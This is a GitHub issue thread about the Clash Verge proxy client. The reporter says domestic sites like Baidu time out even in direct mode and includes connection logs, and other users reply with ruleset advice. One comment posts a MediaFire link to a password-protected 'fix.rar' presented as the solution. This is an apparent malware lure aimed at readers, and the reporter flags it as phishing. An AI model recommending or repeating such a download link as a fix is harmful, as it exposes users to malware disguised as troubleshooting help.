### ISSUE TITLE
[BUG] 访问百度等国内网站有时会失败，大部分要等待很久，切换到直连模式也不行，关掉clash verge就好了，是什么原因？访问国外网站没有这种现象。

### ISSUE THREAD

**Issue by Dontla** [clash-verge-rev/clash-verge-rev#1644]
### 问题描述 / Describe the bug

访问百度等国内网站有时会失败，大部分要等待很久，切换到直连模式也不行，关掉clash verge就好了，是什么原因？访问国外网站没有这种现象。

### 复现步骤 / To Reproduce

打卡规则模式或者直连模式，访问国内网站，比如百度等。

### 操作系统 / OS

Windows

### 操作系统版本 / OS Version

win11

### 日志 / Log

08-27 23:11:28INFO
[TCP] 127.0.0.1:52698(msedge.exe) --> finance-ws.pae.baidu.com:443 match DomainKeyword(baidu) using DIRECT
08-27 23:11:28WARNING
[TCP] dial DIRECT (match DomainKeyword/baidu) 127.0.0.1:52676(msedge.exe) --> cstm.baidu.com:443 error: connect failed: dial tcp 180.101.49.54:443: i/o timeout connect failed: dial tcp [240e:979:e03:1073:0:ff:b052:b66a]:443: connectex: A socket operation was attempted to an unreachable network.
08-27 23:11:28INFO
[TCP] 127.0.0.1:52702(msedge.exe) --> cstm.baidu.com:443 match DomainKeyword(baidu) using DIRECT
08-27 23:11:28WARNING
[TCP] dial DIRECT (match DomainSuffix/cn) 127.0.0.1:52686(msedge.exe) --> assets.msn.cn:443 error: connect failed: dial tcp 27.151.12.70:443: i/o timeout
08-27 23:11:28WARNING
[TCP] dial DIRECT (match DomainSuffix/cn) 127.0.0.1:52687(msedge.exe) --> assets.msn.cn:443 error: connect failed: dial tcp 27.151.12.70:443: i/o timeout
08-27 23:11:28WARNING
[TCP] dial DIRECT (match DomainSuffix/cn) 127.0.0.1:52683(msedge.exe) --> api.msn.cn:443 error: connect failed: dial tcp 202.89.233.96:443: i/o timeout
08-27 23:11:29INFO
[TCP] 127.0.0.1:52706(msedge.exe) --> assets.msn.cn:443 match DomainSuffix(cn) using DIRECT
08-27 23:11:29INFO
[TCP] 127.0.0.1:52705(msedge.exe) --> assets.msn.cn:443 match DomainSuffix(cn) using DIRECT
08-27 23:11:29INFO
[TCP] 127.0.0.1:52707(msedge.exe) --> api.msn.cn:443 match DomainSuffix(cn) using DIRECT
08-27 23:11:35INFO
[TCP] 127.0.0.1:52716(SeAppService.exe) --> puv.tt.browser.360.cn:80 match DomainSuffix(cn) using DIRECT
08-27 23:11:36INFO
[TCP] 127.0.0.1:52732(Code.exe) --> default.exp-tas.com:443 match Match using 狗狗加速.com[🇰🇷25韩国-全网优化(hy2)]
08-27 23:11:37INFO
[TCP] 127.0.0.1:52721 --> geover.prod.do.dsp.mp.microsoft.com:443 match DomainSuffix(microsoft.com) using DIRECT
08-27 23:11:38INFO
[TCP] 127.0.0.1:52755(360se.exe) --> uapi.mp.360.cn:80 match DomainSuffix(cn) using DIRECT
08-27 23:11:40INFO
[TCP] 127.0.0.1:52739(msedgewebview2.exe) --> edge.microsoft.com:443 match DomainSuffix(microsoft.com) using DIRECT
08-27 23:11:40INFO
[TCP] 127.0.0.1:52754(360se.exe) --> cloud.browser.360.cn:80 match DomainSuffix(cn) using DIRECT
08-27 23:11:41INFO
[TCP] 127.0.0.1:52758(360se.exe) --> browser.360.cn:443 match DomainSuffix(cn) using DIRECT
08-27 23:11:41INFO
[TCP] 127.0.0.1:52860(360se.exe) --> browser.360.cn:443 match DomainSuffix(cn) using DIRECT

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dontla** [comment]
上面钓鱼链接毋点！

**Comment by wonfen** [comment]
机场规则的问题

**Comment by daitou05** [comment]
> 机场规则的问题

使用这个 [script](https://www.clashverge.dev/guide/script.html#1) 是不是可以规避机场规则的问题？

**Comment by WangLeoX** [comment]
我一直不太信任自带的规则，看起来太复杂了，
我一直认为规则只要自己手写几条就好[
-国内 直连
-国外 代理
-特殊 代理】
自己再有什么特别得小网站，自己往里头加一加。 
没必要搞那代码山一样的几千行。
出错了你都找不出来是哪条规则没写对。
